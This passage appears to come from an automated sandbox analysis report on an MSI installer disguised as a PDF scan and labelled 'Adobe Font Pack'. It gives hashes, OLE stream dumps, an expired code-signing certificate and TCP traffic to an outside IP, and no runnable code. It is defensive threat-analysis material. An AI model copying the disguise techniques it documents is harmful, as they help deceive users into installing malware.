Entropy (8bit):	7.611236658195378
Encrypted:	false
SSDEEP:	3072:58Xa2c1oag7+aqKVIma2OGwFLOAL4/QUPL8gHtHdNMxOzXNcO2nB:L9oa1aq9oOGwFVL4/QUDDNHdOxOzd0n
MD5:	C0EE31BC6536AE8CB7E5D8809676920A
SHA1:	B21482D1072E5CB65488F2C181F38C75D8C80DCD
SHA-256:	2D8740EA16E9457A358EBEA73AD377FF75F7AA9BDF748F0D801F5A261977EDA4
SHA-512:	66ED8F4762F3CB7B4026C9D7EEAEC2EE4E8275495D527F99FD163D0A72F436EF2E2FDAD88F7DCAD87E3DD10C7AFFFE7B2F0F6C3412DE68C16E96F9377CB4FE1D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7D9A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2028
Entropy (8bit):	5.5711207849274835
Encrypted:	false
SSDEEP:	48:8rWV5/NP3ukWiCuE9D8S0eUdqnYC3ik5aEVltRfBV:oWhDCTL0efn3/aEPtV
MD5:	70F42F05B7BB1A065B69EE93746EDAF0
SHA1:	B322F9DF30F8BA37BF6658340E2097CF2914BAD8
SHA-256:	BCDFA5A34B107060DC338C9AD5E12507D9E07315F19CA54ECE1C9025BEDCD1AE
SHA-512:	E7D33AEAE059073EBE27604C305C95A78C987473953F3BD313A90FBB59E02FDEDFF587F57051EF8EAE962ABDF73F07882DD58D11E65AE6594AED0CF053B69C8F
Malicious:	false
Preview:	...@IXOS.@.....@...T.@.....@.....@.....@.....@.....@......&.{CC038BA5-7236-4713-8948-DFF082243638}..Adobe Font Pack 3.0.12.9..SCAN-068589.pdf.msi.@.....@.....@.....@........&.{717A1233-ED34-40D0-B14C-98BF5C0B90FE}.....@.....@.....@.....@.......@.....@.....@.......@......Adobe Font Pack 3.0.12.9......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}(.01:\Software\AdobeFontPack\AdobeFontPack.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@DD...@.....@......+.C:\Users\user\AppData\Local\AdobeFontPack\....1\vrivulty\\|AdobeFontPack\......Please insert the disk: ..media1.cab.@.....@......C:\Windows\Installer\68bd57.msi.........@........main.dll..main_dll..main.dll.@.....@.D...@.......@.............@......22.2.366.0..1033.@........notify.vbs..notify_vbs..notify.vbs.@..

C:\Windows\Installer\SourceHash{CC038BA5-7236-4713-8948-DFF082243638}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1662052593462282
Encrypted:	false
SSDEEP:	12:JSbX72FjeIGiAGiLIlHVRp+h/7777777777777777777777777vDHFnWYB1l0i8Q:JPGiQI5WjGF
MD5:	75B20ECECB8B7DBEFD0E1E10BFB9ABF8
SHA1:	608175BC461A16E4A6EC77330EA445F835EABE00
SHA-256:	FF206EC7C264B523ECD08E87481CAF360FCA8FDF7A0805C92076C9C98F981AB6
SHA-512:	90DDB65C47100F112ADA77BD4EE95520CFAA5467D2D5BF33F0994256029B61FBDEA0641E60AE37CA012610BC9DDD85846D92D75D69C0B773D8BD3848D0E40B72
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Font Pack 3.0.12.9, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Font Pack, Template: Intel;1033, Revision Number: {717A1233-ED34-40D0-B14C-98BF5C0B90FE}, Create Time/Date: Thu Jun 16 10:54:52 2022, Last Saved Time/Date: Thu Jun 16 10:54:52 2022, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Entropy (8bit):	7.611236658195378
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	SCAN-068589.pdf.msi
File size:	229376
MD5:	c0ee31bc6536ae8cb7e5d8809676920a
SHA1:	b21482d1072e5cb65488f2c181f38c75d8c80dcd
SHA256:	2d8740ea16e9457a358ebea73ad377ff75f7aa9bdf748f0d801f5a261977eda4
SHA512:	66ed8f4762f3cb7b4026c9d7eeaec2ee4e8275495d527f99fd163d0a72f436ef2e2fdad88f7dcad87e3dd10c7afffe7b2f0f6c3412de68c16e96f9377cb4fe1d
SSDEEP:	3072:58Xa2c1oag7+aqKVIma2OGwFLOAL4/QUPL8gHtHdNMxOzXNcO2nB:L9oa1aq9oOGwFVL4/QUDDNHdOxOzd0n
TLSH:	4C24124A33144934C11267382FABF7E647317CCD9E5B8A622297F32C2EB35A056635F4
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number:	-2146762495
Not Before, Not After	5/17/2022 5:00:00 PM 5/11/2023 4:59:59 PM
Subject Chain	CN="Westeast Tech Consulting, Corp.", O="Westeast Tech Consulting, Corp.", L=NORTHRIDGE, S=California, C=US, SERIALNUMBER=4088386, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	0E4E3D01B136D4F9120A1333A90F111F
Thumbprint SHA-1:	2A40875C895B648C9583925C7DAD694A2A11D7DD
Thumbprint SHA-256:	9ED703BA7033AF5F88A5F5EF0155ADC41715D3175EEC836822A09A93D56E4B7F
Serial:	061A27A3A3771BB440FC16CADF2675C4

OLE File "SCAN-068589.pdf.msi"

Indicators

Has Summary Info:
Application Name:	Windows Installer XML Toolset (3.11.2.4516)
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Code Page:	1252
Title:	Installation Database
Subject:	Adobe Font Pack 3.0.12.9
Author:	Adobe Inc.
Keywords:	Installer
Comments:	Adobe Font Pack
Template:	Intel;1033
Revion Number:	{717A1233-ED34-40D0-B14C-98BF5C0B90FE}
Create Time:	2022-06-16 09:54:52
Last Saved Time:	2022-06-16 09:54:52
Number of Pages:	200
Number of Words:	10
Creating Application:	Windows Installer XML Toolset (3.11.2.4516)
Security:	2

Streams

Stream Path: \x5DigitalSignature, File Type: data, Stream Size: 4773

General
Stream Path:	\x5DigitalSignature
File Type:	data
Stream Size:	4773
Entropy:	7.599019489885285
Base64 Encoded:	True
Data ASCII:	0 . . . * H . . . . . 0 . . . . 1 . 0 . . . ` H . e . . . . . . 0 w . . + . . . . 7 . . . i 0 g 0 2 . . + . . . . 7 . . . 0 $ . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . 0 1 0 . . . ` H . e . . . . . . . } . . . 8 Y 4 , 5 . i 4 . . S . ] . 0 . 0 . . . . . . . . @ ` . L ^ . 0 . . . * H . . . . . . 0 b 1 . 0 . . . U . . . . U S 1 . 0 . . . U . . . . D i g i C e r t I n c 1 . 0 . . . U . . . . w w w . d i g i c e r t . c o m 1 ! 0 . . . U . . . . D i g i C e r t T r u s t e d R
Data Raw:	30 82 12 a1 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 12 92 30 82 12 8e 02 01 01 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 77 06 0a 2b 06 01 04 01 82 37 02 01 04 a0 69 30 67 30 32 06 0a 2b 06 01 04 01 82 37 02 01 1e 30 24 02 01 02 04 10 f1 10 0c 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 01 00 02 01 00 02 01 00 02 01 00 02 01 00 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01

Stream Path: \x5MsiDigitalSignatureEx, File Type: data, Stream Size: 32

General
Stream Path:	\x5MsiDigitalSignatureEx
File Type:	data
Stream Size:	32
Entropy:	4.726409765557392
Base64 Encoded:	False
Data ASCII:	N o ) . z : ^ M . ] . . F
Data Raw:	4e 6f 29 ae 97 9b ef ad bd 7a ae df 3a b5 83 5e 4d 9b b8 d2 85 5d 17 01 bb ac f7 b7 ae 46 8c 97

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 476

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	476
Entropy:	4.498978990647221
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l a t i o n D a t a b a s e . . . . . . . . . . . A d o b e F o n t P a c k 3 . 0 . 1 2 . 9 . . . . . . . . . . . . A d o b e I n c . . . . . . . . . . . I n s
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 80 00 00 00 03 00 00 00 a0 00 00 00 04 00 00 00 c4 00 00 00 05 00 00 00 d8 00 00 00 06 00 00 00 ec 00 00 00 07 00 00 00 04 01 00 00 09 00 00 00 18 01 00 00 0c 00 00 00 48 01 00 00

Stream Path: \x16944\x17191\x14436\x16830\x16740, File Type: Microsoft Cabinet archive data, 185058 bytes, 2 files, Stream Size: 185058

General
Stream Path:	\x16944\x17191\x14436\x16830\x16740
File Type:	Microsoft Cabinet archive data, 185058 bytes, 2 files
Stream Size:	185058
Entropy:	7.998106767695454
Base64 Encoded:	True
Data ASCII:	M S C F . . . . . . . . . . , . . . . . . . . . . . . . . . . . . . ` . . . . . . . . D . . . . . . . . T ' o . m a i n _ d l l . D . . . . D . . . . T 8 M . n o t i f y _ v b s . & J . 8 . C K \| . \\ U . z K . , Z n . h e . . + . + 3 . S @ $ . ) . g p . [ . m l F . . . * . Q . ^ . . . \| . . . < . 9 _ u y i . + . . . . W K t 6 k e ; - . . . . ; o y g N s b L l 3 . ~ h \| 9 n . i . R = \\ . . ; x X . 5 ~ r . . . e . h . ~ k Q . \\ V . ] \\ & = 3 5 W s O . . . . n . ~ x m . w = * w L 4 N # 2 { \\ = Q < \\ _ N O
Data Raw:	4d 53 43 46 00 00 00 00 e2 d2 02 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 02 00 00 00 00 00 00 00 60 00 00 00 0d 00 01 00 00 44 06 00 00 00 00 00 00 00 ce 54 27 6f 20 00 6d 61 69 6e 5f 64 6c 6c 00 44 00 00 00 00 44 06 00 00 00 d0 54 38 4d 20 00 6e 6f 74 69 66 79 5f 76 62 73 00 26 4a 8a cf 95 38 00 80 43 4b ec 7c 7f 5c 55 f5 fd ff c5 0b 7a 4b 14 2c 5a 6e 1f b7 68 b9 65 cb

Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 656

General
Stream Path:	\x18496\x15167\x17394\x17464\x17841
File Type:	data
Stream Size:	656
Entropy:	4.728156136205491
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . + . + . + . + . 1 . 1 . 1 . 9 . 9 . 9 . 9 . 9 . I . I . I . I . I . I . I . I . X . X . ] . ] . ] . ] . ] . ] . ] . ] . k . k . k . l . l . l . m . m . m . m . m . m . x . x . z . z . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . #
Data Raw:	07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 31 00 31 00 31 00 39 00 39 00 39 00 39 00 39 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 58 00 58 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 6b 00 6b 00 6b 00 6c 00 6c 00 6c 00 6d 00 6d 00 6d 00 6d 00 6d 00 6d 00 78 00

Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 6703

General
Stream Path:	\x18496\x16191\x17783\x17516\x15210\x17892\x18468
File Type:	ASCII text, with very long lines, with no line terminators
Stream Size:	6703
Entropy:	4.830101882212788
Base64 Encoded:	True
Data ASCII:	N a m e T a b l e T y p e C o l u m n I d e n t i f i e r _ V a l i d a t i o n V a l u e N P r o p e r t y I d _ S u m m a r y I n f o r m a t i o n D e s c r i p t i o n S e t C a t e g o r y K e y T a b l e M a x V a l u e N u l l a b l e K e y C o l u m n M i n V a l u e N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y
Data Raw:	4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 49 64 65 6e 74 69 66 69 65 72 5f 56 61 6c 69 64 61 74 69 6f 6e 56 61 6c 75 65 4e 50 72 6f 70 65 72 74 79 49 64 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 53 65 74 43 61 74 65 67 6f 72 79 4b 65 79 54 61 62 6c 65 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 43 6f 6c 75

Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 852

General
Stream Path:	\x18496\x16191\x17783\x17516\x15978\x17586\x18479
File Type:	data
Stream Size:	852
Entropy:	3.2751779270113106
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . S . . . ^ . . . . . . . . . . . . . . . . . . . . . . . :
Data Raw:	00 00 00 00 04 00 02 00 05 00 02 00 00 00 00 00 04 00 02 00 06 00 02 00 0a 00 1b 00 0b 00 15 00 05 00 05 00 01 00 2d 00 0a 00 01 00 13 00 02 00 0b 00 04 00 03 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 27 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 07 00

Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 34

General
Stream Path:	\x18496\x16255\x16740\x16943\x18486
File Type:	data
Stream Size:	34
Entropy:	3.043731420625169
Base64 Encoded:	False
Data ASCII:	. . " . ) . * . + . 1 . 9 . I . X . ] . k . l . m . x . z . . .
Data Raw:	07 00 22 00 29 00 2a 00 2b 00 31 00 39 00 49 00 58 00 5d 00 6b 00 6c 00 6d 00 78 00 7a 00 85 00 8f 00

Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 2016

General
Stream Path:	\x18496\x16383\x17380\x16876\x17892\x17580\x18481
File Type:	data
Stream Size:	2016
Entropy:	2.3834058956899153
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . + . + . + . + . 1 . 1 . 1 . 9 . 9 . 9 . 9 . 9 . I . I . I . I . I . I . I . I . X . X . ] . ] . ] . ] . ] . ] . ] . ] . k . k . k . l . l . l . m . m . m . m . m . m . x . x . z . z . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . # . % . ' . # . % . ' . % . + . - . 0 . 3 . 6 . 1 . E . G . . . # . < . ? . B . . . 0 . 3 . I . K . M . P . R . Y . [ . ' . 3 . [ . ] . `
Data Raw:	07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 0b 00 0b 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 31 00 31 00 31 00 39 00 39 00 39 00 39 00 39 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 58 00 58 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 6b 00 6b 00 6b 00 6c 00 6c 00 6c 00 6d 00 6d 00 6d 00 6d 00 6d 00

Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48

General
Stream Path:	\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	48
Entropy:	3.0684210940655055
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . x . < .
Data Raw:	9a 00 9b 00 9c 00 9d 00 9e 00 9f 00 a0 00 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 3c 8f a0 8f c8 99

Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 24

General
Stream Path:	\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	24
Entropy:	2.594360937770434
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . .
Data Raw:	9a 00 9b 00 9c 00 a2 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85

Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 42

General
Stream Path:	\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	42
Entropy:	2.865948479683034
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . x . . .
Data Raw:	9a 00 9c 00 9d 00 9e 00 a1 00 a3 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 e8 83 78 85 dc 85 c8 99 9c 98 00 99

Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4

General
Stream Path:	\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
File Type:	data
Stream Size:	4
Entropy:	1.5
Base64 Encoded:	False
Data ASCII:	. .
Data Raw:	b2 00 a5 00

Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 32

General
Stream Path:	\x18496\x16911\x17892\x17784\x18472
File Type:	data
Stream Size:	32
Entropy:	2.472874329980682
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . .
Data Raw:	b2 00 b3 00 b3 00 00 00 b4 00 b6 00 b5 00 00 00 02 80 01 80 01 80 01 80 00 00 a7 00 00 80 00 80

Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14

General
Stream Path:	\x18496\x16918\x17191\x18468
File Type:	MIPSEB Ucode
Stream Size:	14
Entropy:	1.626688849701832
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . .
Data Raw:	01 80 02 00 00 80 00 00 c6 00 00 00 00 00

Stream Path: \x18496\x16923\x17194\x17910\x18229, File Type: data, Stream Size: 12

General
Stream Path:	\x18496\x16923\x17194\x17910\x18229
File Type:	data
Stream Size:	12
Entropy:	2.617492461184755
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	a8 00 01 80 d2 00 d3 00 d4 00 a5 00

Stream Path: \x18496\x16923\x17584\x16953\x17167\x16943, File Type: data, Stream Size: 10

General
Stream Path:	\x18496\x16923\x17584\x16953\x17167\x16943
File Type:	data
Stream Size:	10
Entropy:	1.9609640474436814
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	a7 00 a5 00 00 00 a7 00 02 80

Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18

General
Stream Path:	\x18496\x17165\x16949\x17894\x17778\x18492
File Type:	data
Stream Size:	18
Entropy:	2.102187170949333
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . .
Data Raw:	a7 00 ad 00 af 00 ad 00 af 00 00 00 ae 00 b0 00 b1 00

Stream Path: \x18496\x17167\x16943, File Type: data, Stream Size: 40

General
Stream Path:	\x18496\x17167\x16943
File Type:	data
Stream Size:	40
Entropy:	2.6659614479285128
Base64 Encoded:	False
Data ASCII:	. . . . . . . D . D . . . . . . . . . . . . . . . .
Data Raw:	b7 00 bb 00 a5 00 a5 00 b8 00 bc 00 00 44 06 80 44 00 00 80 b9 00 00 00 ba 00 00 00 00 82 00 82 01 00 00 80 02 00 00 80

Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 120

General
Stream Path:	\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	120
Entropy:	3.6961843239779912
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . ( p . y
Data Raw:	9a 00 9b 00 9c 00 9d 00 9e 00 a0 00 a1 00 a3 00 a4 00 a9 00 ab 00 bd 00 be 00 bf 00 c0 00 c1 00 c2 00 c3 00 c4 00 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 a0 8f c8 99 9c 98 00 99 ca 99 c9 99 bc 82 40 86 08 87 28 8a ac 8d 88 93 70 97 d4 97 79 85

Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 30

General
Stream Path:	\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	30
Entropy:	2.794949047732144
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . .
Data Raw:	9a 00 9b 00 9c 00 a2 00 bd 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85 bc 82

Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 12

General
Stream Path:	\x18496\x17548\x17648\x17522\x17512\x18487
File Type:	data
Stream Size:	12
Entropy:	2.292481250360578
Base64 Encoded:	False
Data ASCII:	. . . . . . .
Data Raw:	a5 00 a6 00 a7 00 04 80 00 00 a8 00

Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 24

General
Stream Path:	\x18496\x17753\x17650\x17768\x18231
File Type:	data
Stream Size:	24
Entropy:	2.792481250360579
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . .
Data Raw:	c7 00 c9 00 cb 00 cc 00 ce 00 d0 00 c8 00 ca 00 ba 00 cd 00 cf 00 d1 00

Stream Path: \x18496\x17814\x15340\x17388\x15464\x17828\x18475, File Type: data, Stream Size: 20

General
Stream Path:	\x18496\x17814\x15340\x17388\x15464\x17828\x18475
File Type:	data
Stream Size:	20
Entropy:	4.1219280948873624
Base64 Encoded:	False
Data ASCII:	. . . . A Q f y .
Data Raw:	bb 00 00 80 03 08 aa ac 8d ab 8a e9 de 41 f5 51 66 79 bb 1b

Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 24

General
Stream Path:	\x18496\x17932\x17910\x17458\x16778\x17207\x17522
File Type:	data
Stream Size:	24
Entropy:	2.1140054628542204
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . .
Data Raw:	a9 00 ab 00 e2 80 e2 80 a7 00 a7 00 aa 00 ac 00 00 00 00 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 16, 2022 20:22:56.935597897 CEST	49179	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:56.935655117 CEST	443	49179	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:56.935733080 CEST	49179	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:56.936238050 CEST	49179	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:56.936328888 CEST	443	49179	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:56.936407089 CEST	49179	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:57.200285912 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:57.200345039 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:57.200429916 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:57.446091890 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:57.446129084 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:57.627953053 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:57.628128052 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:57.644754887 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:57.644792080 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:57.645164013 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:57.645272970 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.332617044 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.376611948 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.414904118 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.415039062 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.415049076 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.415067911 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.415155888 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.416419983 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.416435003 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.416498899 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.474594116 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.474733114 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.474756002 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.474772930 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.474832058 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.475241899 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.475251913 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.534774065 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.534934998 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.535008907 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.535034895 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.535047054 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.535083055 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.535087109 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.535963058 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.536052942 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.536098957 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.536168098 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.536812067 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.536906004 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.536947966 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.537017107 CEST	49180	443	192.168.2.22	213.226.114.15
